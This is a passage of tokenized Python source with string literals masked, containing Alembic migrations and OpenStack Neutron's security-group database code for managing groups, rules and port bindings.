<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import sql <EOL> def upgrade ( ) : <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = False , primary_key = True , index = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = False , primary_key = True , index = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False , <EOL> server_default = sql . false ( ) ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False , <EOL> server_default = '<STR_LIT:0>' ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False , <EOL> server_default = '<STR_LIT:0>' ) ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) ) ) </s>
<s> import netaddr <EOL> from neutron_lib . api import validators <EOL> from neutron_lib import constants <EOL> from oslo_db import exception as db_exc <EOL> from oslo_log import log as logging <EOL> from oslo_utils import uuidutils <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import orm <EOL> from sqlalchemy . orm import exc <EOL> from sqlalchemy . orm import scoped_session <EOL> from neutron . _i18n import _ <EOL> from neutron . api . v2 import attributes <EOL> from neutron . callbacks import events <EOL> from neutron . callbacks import exceptions <EOL> from neutron . callbacks import registry <EOL> from neutron . callbacks import resources <EOL> from neutron . common import constants as n_const <EOL> from neutron . common import utils <EOL> from neutron . db import api as db_api <EOL> from neutron . db import db_base_plugin_v2 <EOL> from neutron . db import model_base <EOL> from neutron . db import models_v2 <EOL> from neutron . extensions import securitygroup as ext_sg <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class SecurityGroup ( model_base . HasStandardAttributes , model_base . BASEV2 , <EOL> model_base . HasId , model_base . HasTenant ) : <EOL> """<STR_LIT>""" <EOL> name = sa . Column ( sa . String ( attributes . NAME_MAX_LEN ) ) <EOL> class DefaultSecurityGroup ( model_base . BASEV2 ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> tenant_id = sa . Column ( sa . String ( attributes . TENANT_ID_MAX_LEN ) , <EOL> primary_key = True , nullable = False ) <EOL> security_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = "<STR_LIT>" ) , <EOL> nullable = False ) <EOL> security_group = orm . relationship ( <EOL> SecurityGroup , lazy = '<STR_LIT>' , <EOL> backref = orm . backref ( '<STR_LIT>' , cascade = '<STR_LIT>' ) , <EOL> primaryjoin = "<STR_LIT>" , <EOL> ) <EOL> class SecurityGroupPortBinding ( model_base . BASEV2 ) : <EOL> """<STR_LIT>""" <EOL> port_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> security_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" ) , <EOL> primary_key = True ) <EOL> ports = orm . relationship ( <EOL> models_v2 . Port , <EOL> backref = orm . backref ( "<STR_LIT>" , <EOL> lazy = '<STR_LIT>' , cascade = '<STR_LIT>' ) ) <EOL> class SecurityGroupRule ( model_base . HasStandardAttributes , model_base . BASEV2 , <EOL> model_base . HasId , model_base . HasTenant ) : <EOL> """<STR_LIT>""" <EOL> security_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = "<STR_LIT>" ) , <EOL> nullable = False ) <EOL> remote_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = "<STR_LIT>" ) , <EOL> nullable = True ) <EOL> direction = sa . Column ( sa . Enum ( '<STR_LIT>' , '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) ) <EOL> ethertype = sa . Column ( sa . String ( <NUM_LIT> ) ) <EOL> protocol = sa . Column ( sa . String ( <NUM_LIT> ) ) <EOL> port_range_min = sa . Column ( sa . Integer ) <EOL> port_range_max = sa . Column ( sa . Integer ) <EOL> remote_ip_prefix = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> security_group = orm . relationship ( <EOL> SecurityGroup , <EOL> backref = orm . backref ( '<STR_LIT>' , cascade = '<STR_LIT>' , lazy = '<STR_LIT>' ) , <EOL> primaryjoin = "<STR_LIT>" ) <EOL> source_group = orm . relationship ( <EOL> SecurityGroup , <EOL> backref = orm . backref ( '<STR_LIT>' , cascade = '<STR_LIT>' ) , <EOL> primaryjoin = "<STR_LIT>" ) <EOL> class SecurityGroupDbMixin ( ext_sg . SecurityGroupPluginBase ) : <EOL> """<STR_LIT>""" <EOL> __native_bulk_support = True <EOL> def create_security_group_bulk ( self , context , security_group_rule ) : <EOL> return self . _create_bulk ( '<STR_LIT>' , context , <EOL> security_group_rule ) <EOL> def _registry_notify ( self , res , event , id = None , exc_cls = None , ** kwargs ) : <EOL> try : <EOL> registry . notify ( res , event , self , ** kwargs ) <EOL> except exceptions . CallbackFailure as e : <EOL> if exc_cls : <EOL> reason = ( _ ( '<STR_LIT>' ) % <EOL> { '<STR_LIT>' : event , '<STR_LIT>' : e } ) <EOL> raise exc_cls ( reason = reason , id = id ) <EOL> def create_security_group ( self , context , security_group , default_sg = False ) : <EOL> """<STR_LIT>""" <EOL> s = security_group [ '<STR_LIT>' ] <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : s , <EOL> '<STR_LIT>' : default_sg , <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP , events . BEFORE_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> tenant_id = s [ '<STR_LIT>' ] <EOL> if not default_sg : <EOL> self . _ensure_default_security_group ( context , tenant_id ) <EOL> with db_api . autonested_transaction ( context . session ) : <EOL> security_group_db = SecurityGroup ( id = s . get ( '<STR_LIT:id>' ) or ( <EOL> uuidutils . generate_uuid ( ) ) , <EOL> description = s [ '<STR_LIT:description>' ] , <EOL> tenant_id = tenant_id , <EOL> name = s [ '<STR_LIT:name>' ] ) <EOL> context . session . add ( security_group_db ) <EOL> if default_sg : <EOL> context . session . add ( DefaultSecurityGroup ( <EOL> security_group = security_group_db , <EOL> tenant_id = security_group_db [ '<STR_LIT>' ] ) ) <EOL> for ethertype in ext_sg . sg_supported_ethertypes : <EOL> if default_sg : <EOL> ingress_rule = SecurityGroupRule ( <EOL> id = uuidutils . generate_uuid ( ) , tenant_id = tenant_id , <EOL> security_group = security_group_db , <EOL> direction = '<STR_LIT>' , <EOL> ethertype = ethertype , <EOL> source_group = security_group_db ) <EOL> context . session . add ( ingress_rule ) <EOL> egress_rule = SecurityGroupRule ( <EOL> id = uuidutils . generate_uuid ( ) , tenant_id = tenant_id , <EOL> security_group = security_group_db , <EOL> direction = '<STR_LIT>' , <EOL> ethertype = ethertype ) <EOL> context . session . add ( egress_rule ) <EOL> self . _registry_notify ( resources . SECURITY_GROUP , <EOL> events . PRECOMMIT_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , <EOL> ** kwargs ) <EOL> secgroup_dict = self . _make_security_group_dict ( security_group_db ) <EOL> kwargs [ '<STR_LIT>' ] = secgroup_dict <EOL> registry . notify ( resources . SECURITY_GROUP , events . AFTER_CREATE , self , <EOL> ** kwargs ) <EOL> return secgroup_dict <EOL> def get_security_groups ( self , context , filters = None , fields = None , <EOL> sorts = None , limit = None , <EOL> marker = None , page_reverse = False , default_sg = False ) : <EOL> if not default_sg and context . tenant_id : <EOL> tenant_id = filters . get ( '<STR_LIT>' ) <EOL> if tenant_id : <EOL> tenant_id = tenant_id [ <NUM_LIT:0> ] <EOL> else : <EOL> tenant_id = context . tenant_id <EOL> self . _ensure_default_security_group ( context , tenant_id ) <EOL> marker_obj = self . _get_marker_obj ( context , '<STR_LIT>' , limit , <EOL> marker ) <EOL> return self . _get_collection ( context , <EOL> SecurityGroup , <EOL> self . _make_security_group_dict , <EOL> filters = filters , fields = fields , <EOL> sorts = sorts , <EOL> limit = limit , marker_obj = marker_obj , <EOL> page_reverse = page_reverse ) <EOL> def get_security_groups_count ( self , context , filters = None ) : <EOL> return self . _get_collection_count ( context , SecurityGroup , <EOL> filters = filters ) <EOL> def get_security_group ( self , context , id , fields = None , tenant_id = None ) : <EOL> """<STR_LIT>""" <EOL> if tenant_id : <EOL> tmp_context_tenant_id = context . tenant_id <EOL> context . tenant_id = tenant_id <EOL> try : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> ret = self . _make_security_group_dict ( self . _get_security_group ( <EOL> context , id ) , fields ) <EOL> ret [ '<STR_LIT>' ] = self . get_security_group_rules ( <EOL> context , { '<STR_LIT>' : [ id ] } ) <EOL> finally : <EOL> if tenant_id : <EOL> context . tenant_id = tmp_context_tenant_id <EOL> return ret <EOL> def _get_security_group ( self , context , id ) : <EOL> try : <EOL> query = self . _model_query ( context , SecurityGroup ) <EOL> sg = query . filter ( SecurityGroup . id == id ) . one ( ) <EOL> except exc . NoResultFound : <EOL> raise ext_sg . SecurityGroupNotFound ( id = id ) <EOL> return sg <EOL> def delete_security_group ( self , context , id ) : <EOL> filters = { '<STR_LIT>' : [ id ] } <EOL> ports = self . _get_port_security_group_bindings ( context , filters ) <EOL> if ports : <EOL> raise ext_sg . SecurityGroupInUse ( id = id ) <EOL> sg = self . _get_security_group ( context , id ) <EOL> if sg [ '<STR_LIT:name>' ] == '<STR_LIT:default>' and not context . is_admin : <EOL> raise ext_sg . SecurityGroupCannotRemoveDefault ( ) <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : id , <EOL> '<STR_LIT>' : sg , <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP , events . BEFORE_DELETE , <EOL> exc_cls = ext_sg . SecurityGroupInUse , id = id , <EOL> ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> self . _registry_notify ( resources . SECURITY_GROUP , <EOL> events . PRECOMMIT_DELETE , <EOL> exc_cls = ext_sg . SecurityGroupInUse , id = id , <EOL> ** kwargs ) <EOL> context . session . delete ( sg ) <EOL> kwargs . pop ( '<STR_LIT>' ) <EOL> registry . notify ( resources . SECURITY_GROUP , events . AFTER_DELETE , self , <EOL> ** kwargs ) <EOL> def update_security_group ( self , context , id , security_group ) : <EOL> s = security_group [ '<STR_LIT>' ] <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : id , <EOL> '<STR_LIT>' : s , <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP , events . BEFORE_UPDATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> sg = self . _get_security_group ( context , id ) <EOL> if sg [ '<STR_LIT:name>' ] == '<STR_LIT:default>' and '<STR_LIT:name>' in s : <EOL> raise ext_sg . SecurityGroupCannotUpdateDefault ( ) <EOL> self . _registry_notify ( <EOL> resources . SECURITY_GROUP , <EOL> events . PRECOMMIT_UPDATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> sg . update ( s ) <EOL> sg_dict = self . _make_security_group_dict ( sg ) <EOL> kwargs [ '<STR_LIT>' ] = sg_dict <EOL> registry . notify ( resources . SECURITY_GROUP , events . AFTER_UPDATE , self , <EOL> ** kwargs ) <EOL> return sg_dict <EOL> def _make_security_group_dict ( self , security_group , fields = None ) : <EOL> res = { '<STR_LIT:id>' : security_group [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : security_group [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : security_group [ '<STR_LIT>' ] , <EOL> '<STR_LIT:description>' : security_group [ '<STR_LIT:description>' ] } <EOL> res [ '<STR_LIT>' ] = [ self . _make_security_group_rule_dict ( r ) <EOL> for r in security_group . rules ] <EOL> self . _apply_dict_extend_functions ( ext_sg . SECURITYGROUPS , res , <EOL> security_group ) <EOL> return self . _fields ( res , fields ) <EOL> def _make_security_group_binding_dict ( self , security_group , fields = None ) : <EOL> res = { '<STR_LIT>' : security_group [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group [ '<STR_LIT>' ] } <EOL> return self . _fields ( res , fields ) <EOL> def _create_port_security_group_binding ( self , context , port_id , <EOL> security_group_id ) : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> db = SecurityGroupPortBinding ( port_id = port_id , <EOL> security_group_id = security_group_id ) <EOL> context . session . add ( db ) <EOL> def _get_port_security_group_bindings ( self , context , <EOL> filters = None , fields = None ) : <EOL> return self . _get_collection ( context , <EOL> SecurityGroupPortBinding , <EOL> self . _make_security_group_binding_dict , <EOL> filters = filters , fields = fields ) <EOL> def _delete_port_security_group_bindings ( self , context , port_id ) : <EOL> query = self . _model_query ( context , SecurityGroupPortBinding ) <EOL> bindings = query . filter ( <EOL> SecurityGroupPortBinding . port_id == port_id ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> for binding in bindings : <EOL> context . session . delete ( binding ) <EOL> def create_security_group_rule_bulk ( self , context , security_group_rules ) : <EOL> return self . _create_bulk ( '<STR_LIT>' , context , <EOL> security_group_rules ) <EOL> def create_security_group_rule_bulk_native ( self , context , <EOL> security_group_rules ) : <EOL> rules = security_group_rules [ '<STR_LIT>' ] <EOL> scoped_session ( context . session ) <EOL> security_group_id = self . _validate_security_group_rules ( <EOL> context , security_group_rules ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> if not self . get_security_group ( context , security_group_id ) : <EOL> raise ext_sg . SecurityGroupNotFound ( id = security_group_id ) <EOL> self . _check_for_duplicate_rules ( context , rules ) <EOL> ret = [ ] <EOL> for rule_dict in rules : <EOL> res_rule_dict = self . _create_security_group_rule ( <EOL> context , rule_dict , validate = False ) <EOL> ret . append ( res_rule_dict ) <EOL> return ret <EOL> def create_security_group_rule ( self , context , security_group_rule ) : <EOL> return self . _create_security_group_rule ( context , security_group_rule ) <EOL> def _create_security_group_rule ( self , context , security_group_rule , <EOL> validate = True ) : <EOL> if validate : <EOL> self . _validate_security_group_rule ( context , security_group_rule ) <EOL> self . _check_for_duplicate_rules_in_db ( context , security_group_rule ) <EOL> rule_dict = security_group_rule [ '<STR_LIT>' ] <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : rule_dict <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . BEFORE_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> db = SecurityGroupRule ( <EOL> id = ( rule_dict . get ( '<STR_LIT:id>' ) or uuidutils . generate_uuid ( ) ) , <EOL> tenant_id = rule_dict [ '<STR_LIT>' ] , <EOL> security_group_id = rule_dict [ '<STR_LIT>' ] , <EOL> direction = rule_dict [ '<STR_LIT>' ] , <EOL> remote_group_id = rule_dict . get ( '<STR_LIT>' ) , <EOL> ethertype = rule_dict [ '<STR_LIT>' ] , <EOL> protocol = rule_dict [ '<STR_LIT>' ] , <EOL> port_range_min = rule_dict [ '<STR_LIT>' ] , <EOL> port_range_max = rule_dict [ '<STR_LIT>' ] , <EOL> remote_ip_prefix = rule_dict . get ( '<STR_LIT>' ) , <EOL> description = rule_dict . get ( '<STR_LIT:description>' ) <EOL> ) <EOL> context . session . add ( db ) <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . PRECOMMIT_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> res_rule_dict = self . _make_security_group_rule_dict ( db ) <EOL> kwargs [ '<STR_LIT>' ] = res_rule_dict <EOL> registry . notify ( <EOL> resources . SECURITY_GROUP_RULE , events . AFTER_CREATE , self , <EOL> ** kwargs ) <EOL> return res_rule_dict <EOL> def _get_ip_proto_number ( self , protocol ) : <EOL> if protocol is None : <EOL> return <EOL> if protocol in n_const . IP_PROTOCOL_NAME_ALIASES : <EOL> protocol = n_const . IP_PROTOCOL_NAME_ALIASES [ protocol ] <EOL> return int ( constants . IP_PROTOCOL_MAP . get ( protocol , protocol ) ) <EOL> def _get_ip_proto_name_and_num ( self , protocol ) : <EOL> if protocol is None : <EOL> return <EOL> protocol = str ( protocol ) <EOL> if protocol in constants . IP_PROTOCOL_MAP : <EOL> return [ protocol , str ( constants . IP_PROTOCOL_MAP . get ( protocol ) ) ] <EOL> elif protocol in n_const . IP_PROTOCOL_NUM_TO_NAME_MAP : <EOL> return [ n_const . IP_PROTOCOL_NUM_TO_NAME_MAP . get ( protocol ) , <EOL> protocol ] <EOL> return [ protocol , protocol ] <EOL> def _validate_port_range ( self , rule ) : <EOL> """<STR_LIT>""" <EOL> if ( rule [ '<STR_LIT>' ] is None and <EOL> rule [ '<STR_LIT>' ] is None ) : <EOL> return <EOL> if not rule [ '<STR_LIT>' ] : <EOL> raise ext_sg . SecurityGroupProtocolRequiredWithPorts ( ) <EOL> ip_proto = self . _get_ip_proto_number ( rule [ '<STR_LIT>' ] ) <EOL> if ip_proto in [ constants . PROTO_NUM_TCP , constants . PROTO_NUM_UDP ] : <EOL> if rule [ '<STR_LIT>' ] == <NUM_LIT:0> or rule [ '<STR_LIT>' ] == <NUM_LIT:0> : <EOL> raise ext_sg . SecurityGroupInvalidPortValue ( port = <NUM_LIT:0> ) <EOL> elif ( rule [ '<STR_LIT>' ] is not None and <EOL> rule [ '<STR_LIT>' ] is not None and <EOL> rule [ '<STR_LIT>' ] <= rule [ '<STR_LIT>' ] ) : <EOL> pass <EOL> else : <EOL> raise ext_sg . SecurityGroupInvalidPortRange ( ) <EOL> elif ip_proto == constants . PROTO_NUM_ICMP : <EOL> for attr , field in [ ( '<STR_LIT>' , '<STR_LIT:type>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:code>' ) ] : <EOL> if rule [ attr ] is not None and not ( <NUM_LIT:0> <= rule [ attr ] <= <NUM_LIT:255> ) : <EOL> raise ext_sg . SecurityGroupInvalidIcmpValue ( <EOL> field = field , attr = attr , value = rule [ attr ] ) <EOL> if ( rule [ '<STR_LIT>' ] is None and <EOL> rule [ '<STR_LIT>' ] is not None ) : <EOL> raise ext_sg . SecurityGroupMissingIcmpType ( <EOL> value = rule [ '<STR_LIT>' ] ) <EOL> def _validate_ethertype_and_protocol ( self , rule ) : <EOL> """<STR_LIT>""" <EOL> if rule [ '<STR_LIT>' ] in [ constants . PROTO_NAME_IPV6_ENCAP , <EOL> constants . PROTO_NAME_IPV6_FRAG , <EOL> constants . PROTO_NAME_IPV6_ICMP , <EOL> n_const . PROTO_NAME_IPV6_ICMP_LEGACY , <EOL> constants . PROTO_NAME_IPV6_NONXT , <EOL> constants . PROTO_NAME_IPV6_OPTS , <EOL> constants . PROTO_NAME_IPV6_ROUTE ] : <EOL> if rule [ '<STR_LIT>' ] == constants . IPv4 : <EOL> raise ext_sg . SecurityGroupEthertypeConflictWithProtocol ( <EOL> ethertype = rule [ '<STR_LIT>' ] , protocol = rule [ '<STR_LIT>' ] ) <EOL> def _validate_single_tenant_and_group ( self , security_group_rules ) : <EOL> """<STR_LIT>""" <EOL> sg_groups = set ( ) <EOL> tenants = set ( ) <EOL> for rule_dict in security_group_rules [ '<STR_LIT>' ] : <EOL> rule = rule_dict [ '<STR_LIT>' ] <EOL> sg_groups . add ( rule [ '<STR_LIT>' ] ) <EOL> if len ( sg_groups ) > <NUM_LIT:1> : <EOL> raise ext_sg . SecurityGroupNotSingleGroupRules ( ) <EOL> tenants . add ( rule [ '<STR_LIT>' ] ) <EOL> if len ( tenants ) > <NUM_LIT:1> : <EOL> raise ext_sg . SecurityGroupRulesNotSingleTenant ( ) <EOL> return sg_groups . pop ( ) <EOL> def _validate_security_group_rule ( self , context , security_group_rule ) : <EOL> rule = security_group_rule [ '<STR_LIT>' ] <EOL> self . _validate_port_range ( rule ) <EOL> self . _validate_ip_prefix ( rule ) <EOL> self . _validate_ethertype_and_protocol ( rule ) <EOL> if rule [ '<STR_LIT>' ] and rule [ '<STR_LIT>' ] : <EOL> raise ext_sg . SecurityGroupRemoteGroupAndRemoteIpPrefix ( ) <EOL> remote_group_id = rule [ '<STR_LIT>' ] <EOL> if remote_group_id : <EOL> self . get_security_group ( context , remote_group_id , <EOL> tenant_id = rule [ '<STR_LIT>' ] ) <EOL> security_group_id = rule [ '<STR_LIT>' ] <EOL> self . get_security_group ( context , security_group_id , <EOL> tenant_id = rule [ '<STR_LIT>' ] ) <EOL> return security_group_id <EOL> def _validate_security_group_rules ( self , context , security_group_rules ) : <EOL> sg_id = self . _validate_single_tenant_and_group ( security_group_rules ) <EOL> for rule in security_group_rules [ '<STR_LIT>' ] : <EOL> self . _validate_security_group_rule ( context , rule ) <EOL> return sg_id <EOL> def _make_security_group_rule_dict ( self , security_group_rule , fields = None ) : <EOL> res = { '<STR_LIT:id>' : security_group_rule [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] } <EOL> self . _apply_dict_extend_functions ( ext_sg . SECURITYGROUPRULES , res , <EOL> security_group_rule ) <EOL> return self . _fields ( res , fields ) <EOL> def _make_security_group_rule_filter_dict ( self , security_group_rule ) : <EOL> sgr = security_group_rule [ '<STR_LIT>' ] <EOL> res = { '<STR_LIT>' : [ sgr [ '<STR_LIT>' ] ] , <EOL> '<STR_LIT>' : [ sgr [ '<STR_LIT>' ] ] , <EOL> '<STR_LIT>' : [ sgr [ '<STR_LIT>' ] ] } <EOL> include_if_present = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' ] <EOL> for key in include_if_present : <EOL> value = sgr . get ( key ) <EOL> if value : <EOL> res [ key ] = [ value ] <EOL> value = sgr . get ( '<STR_LIT>' ) <EOL> if value : <EOL> res [ '<STR_LIT>' ] = self . _get_ip_proto_name_and_num ( value ) <EOL> return res <EOL> def _rules_equal ( self , rule1 , rule2 ) : <EOL> """<STR_LIT>""" <EOL> rule1_copy = rule1 . copy ( ) <EOL> rule2_copy = rule2 . copy ( ) <EOL> rule1_copy . pop ( '<STR_LIT:id>' , None ) <EOL> rule2_copy . pop ( '<STR_LIT:id>' , None ) <EOL> return rule1_copy == rule2_copy <EOL> def _check_for_duplicate_rules ( self , context , security_group_rules ) : <EOL> for i in security_group_rules : <EOL> found_self = False <EOL> for j in security_group_rules : <EOL> if self . _rules_equal ( i [ '<STR_LIT>' ] , <EOL> j [ '<STR_LIT>' ] ) : <EOL> if found_self : <EOL> raise ext_sg . DuplicateSecurityGroupRuleInPost ( rule = i ) <EOL> found_self = True <EOL> self . _check_for_duplicate_rules_in_db ( context , i ) <EOL> def _check_for_duplicate_rules_in_db ( self , context , security_group_rule ) : <EOL> filters = self . _make_security_group_rule_filter_dict ( <EOL> security_group_rule ) <EOL> keys = security_group_rule [ '<STR_LIT>' ] . keys ( ) <EOL> fields = list ( keys ) + [ '<STR_LIT:id>' ] <EOL> db_rules = self . get_security_group_rules ( context , filters , <EOL> fields = fields ) <EOL> rule_dict = security_group_rule [ '<STR_LIT>' ] . copy ( ) <EOL> rule_dict . pop ( '<STR_LIT:id>' , None ) <EOL> sg_protocol = rule_dict . pop ( '<STR_LIT>' , None ) <EOL> for db_rule in db_rules : <EOL> rule_id = db_rule . pop ( '<STR_LIT:id>' , None ) <EOL> db_protocol = db_rule . pop ( '<STR_LIT>' , None ) <EOL> is_protocol_matching = ( <EOL> self . _get_ip_proto_name_and_num ( db_protocol ) == <EOL> self . _get_ip_proto_name_and_num ( sg_protocol ) ) <EOL> if ( is_protocol_matching and rule_dict == db_rule ) : <EOL> raise ext_sg . SecurityGroupRuleExists ( rule_id = rule_id ) <EOL> def _validate_ip_prefix ( self , rule ) : <EOL> """<STR_LIT>""" <EOL> input_prefix = rule [ '<STR_LIT>' ] <EOL> if input_prefix : <EOL> addr = netaddr . IPNetwork ( input_prefix ) <EOL> rule [ '<STR_LIT>' ] = str ( addr ) <EOL> if rule [ '<STR_LIT>' ] != "<STR_LIT>" % ( addr . version ) : <EOL> raise ext_sg . SecurityGroupRuleParameterConflict ( <EOL> ethertype = rule [ '<STR_LIT>' ] , cidr = input_prefix ) <EOL> def get_security_group_rules ( self , context , filters = None , fields = None , <EOL> sorts = None , limit = None , marker = None , <EOL> page_reverse = False ) : <EOL> marker_obj = self . _get_marker_obj ( context , '<STR_LIT>' , <EOL> limit , marker ) <EOL> return self . _get_collection ( context , <EOL> SecurityGroupRule , <EOL> self . _make_security_group_rule_dict , <EOL> filters = filters , fields = fields , <EOL> sorts = sorts , <EOL> limit = limit , marker_obj = marker_obj , <EOL> page_reverse = page_reverse ) <EOL> def get_security_group_rules_count ( self , context , filters = None ) : <EOL> return self . _get_collection_count ( context , SecurityGroupRule , <EOL> filters = filters ) <EOL> def get_security_group_rule ( self , context , id , fields = None ) : <EOL> security_group_rule = self . _get_security_group_rule ( context , id ) <EOL> return self . _make_security_group_rule_dict ( security_group_rule , fields ) <EOL> def _get_security_group_rule ( self , context , id ) : <EOL> try : <EOL> query = self . _model_query ( context , SecurityGroupRule ) <EOL> sgr = query . filter ( SecurityGroupRule . id == id ) . one ( ) <EOL> except exc . NoResultFound : <EOL> raise ext_sg . SecurityGroupRuleNotFound ( id = id ) <EOL> return sgr <EOL> def delete_security_group_rule ( self , context , id ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : id <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . BEFORE_DELETE , id = id , <EOL> exc_cls = ext_sg . SecurityGroupRuleInUse , ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> query = self . _model_query ( context , SecurityGroupRule ) . filter ( <EOL> SecurityGroupRule . id == id ) <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . PRECOMMIT_DELETE , <EOL> exc_cls = ext_sg . SecurityGroupRuleInUse , id = id , <EOL> ** kwargs ) <EOL> try : <EOL> context . session . delete ( query . one ( ) ) <EOL> except exc . NoResultFound : <EOL> raise ext_sg . SecurityGroupRuleNotFound ( id = id ) <EOL> registry . notify ( <EOL> resources . SECURITY_GROUP_RULE , events . AFTER_DELETE , self , <EOL> ** kwargs ) <EOL> def _extend_port_dict_security_group ( self , port_res , port_db ) : <EOL> security_group_ids = [ sec_group_mapping [ '<STR_LIT>' ] for <EOL> sec_group_mapping in port_db . security_groups ] <EOL> port_res [ ext_sg . SECURITYGROUPS ] = security_group_ids <EOL> return port_res <EOL> db_base_plugin_v2 . NeutronDbPluginV2 . register_dict_extend_funcs ( <EOL> attributes . PORTS , [ '<STR_LIT>' ] ) <EOL> def _process_port_create_security_group ( self , context , port , <EOL> security_group_ids ) : <EOL> if validators . is_attr_set ( security_group_ids ) : <EOL> for security_group_id in security_group_ids : <EOL> self . _create_port_security_group_binding ( context , port [ '<STR_LIT:id>' ] , <EOL> security_group_id ) <EOL> port [ ext_sg . SECURITYGROUPS ] = ( security_group_ids and <EOL> list ( security_group_ids ) or [ ] ) <EOL> def _ensure_default_security_group ( self , context , tenant_id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> query = self . _model_query ( context , DefaultSecurityGroup ) <EOL> default_group = query . filter_by ( tenant_id = tenant_id ) . one ( ) <EOL> return default_group [ '<STR_LIT>' ] <EOL> except exc . NoResultFound : <EOL> return self . _create_default_security_group ( context , tenant_id ) <EOL> def _create_default_security_group ( self , context , tenant_id ) : <EOL> security_group = { <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : tenant_id , <EOL> '<STR_LIT:description>' : _ ( '<STR_LIT>' ) } <EOL> } <EOL> try : <EOL> security_group = self . create_security_group ( <EOL> context , security_group , default_sg = True ) <EOL> return security_group [ '<STR_LIT:id>' ] <EOL> except db_exc . DBDuplicateEntry as ex : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , ex . value ) <EOL> raise db_exc . RetryRequest ( ex ) <EOL> def _get_security_groups_on_port ( self , context , port ) : <EOL> """<STR_LIT>""" <EOL> port = port [ '<STR_LIT:port>' ] <EOL> if not validators . is_attr_set ( port . get ( ext_sg . SECURITYGROUPS ) ) : <EOL> return <EOL> if port . get ( '<STR_LIT>' ) and utils . is_port_trusted ( port ) : <EOL> return <EOL> port_sg = port . get ( ext_sg . SECURITYGROUPS , [ ] ) <EOL> filters = { '<STR_LIT:id>' : port_sg } 